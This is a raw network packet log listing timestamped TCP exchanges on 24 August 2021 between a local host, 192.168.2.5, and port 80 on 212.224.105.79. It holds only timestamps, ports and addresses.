Aug 24, 2021 08:49:15.054929972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054960966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.054981947 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.054986954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055010080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055027962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055037975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055059910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055074930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055084944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055105925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055130005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055151939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055176973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055193901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055201054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055224895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055243015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055248022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055284977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055308104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055310011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055337906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055349112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055361032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055382967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055403948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055407047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055429935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055444002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055453062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055474997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055499077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055501938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055522919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055536985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055545092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055567026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055588007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055597067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055614948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055636883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055638075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055664062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055682898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055689096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055727005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055744886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055747986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055771112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055788994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055795908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055820942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055841923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055852890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055864096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055886030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055892944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055907011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055928946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055948973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055948973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055974960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.055984974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.055998087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.056009054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.056020021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.056056023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.056072950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078206062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078259945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078286886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078310966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078321934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078334093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078355074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078358889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078387022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078408957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078411102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078432083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078447104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078457117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078478098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078491926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078500032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078521967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078541994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078552008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078564882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078578949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078588009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078610897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078627110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078634024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078656912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078681946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078687906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078708887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078737974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078743935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078766108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078777075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078789949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078814030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078838110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078840971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078861952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078881979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078883886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078908920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078917027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078933001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078948975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078964949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.078980923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.078989983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079005957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079013109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079034090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079054117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079066992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079076052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079097033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079101086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079138041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079138994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079164028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079184055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079207897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079210043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079236984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079252005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079261065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079286098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079304934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079310894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079334021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079353094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079358101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079380989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079395056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079406023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079430103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079451084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079453945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079474926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079487085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079495907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079540014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079582930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079607010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079628944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079643965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079653978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079675913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079691887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079699039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079721928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079737902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079749107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079772949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079796076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079813004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079835892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079850912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079859972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079883099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079900026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079906940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079929113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079948902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.079955101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079979897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.079992056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080002069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080024958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080035925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080049992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080071926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080085993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080094099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080116987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080131054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080142021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080166101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080183983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080187082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080209970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080226898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080233097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080255985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080272913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080279112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080303907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080319881 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080328941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080352068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080368996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080383062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080405951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080419064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080427885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080451012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080466986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080476999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080501080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080522060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080522060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080545902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080564976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080569983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080593109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080607891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080615044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080637932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080648899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080663919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080687046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080704927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080708027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080730915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080741882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080754042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080780029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080789089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080809116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080832958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080843925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080858946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080883980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080895901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080915928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080939054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080950022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.080961943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080984116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.080996990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081007004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081037045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081043959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081058979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081083059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081093073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081104040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081127882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081137896 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081151962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081181049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081186056 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081203938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081229925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081238985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081254959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081279039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081290960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081300974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081324100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081340075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081346035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081372976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081382036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081397057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081418991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081437111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081442118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081469059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081476927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081496954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081520081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081532955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081542969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081563950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081576109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081588030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081609964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081620932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081635952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081660032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081671000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081681967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081707001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081717014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081729889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081751108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081772089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081773996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081799984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081809998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081826925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081851959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081861973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.081873894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.081908941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104108095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104147911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104217052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104394913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104422092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104445934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104468107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104476929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104490042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104512930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104512930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104536057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104552984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104557037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104576111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104593039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104609966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104623079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104635954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104652882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104671955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104681969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104691982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104710102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104731083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104731083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104756117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104773045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104782104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104804039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104820967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104823112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104846954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104867935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104868889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104891062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104913950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104928017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104938984 CEST	80	49712	212.224.105.79	192.168.2.5
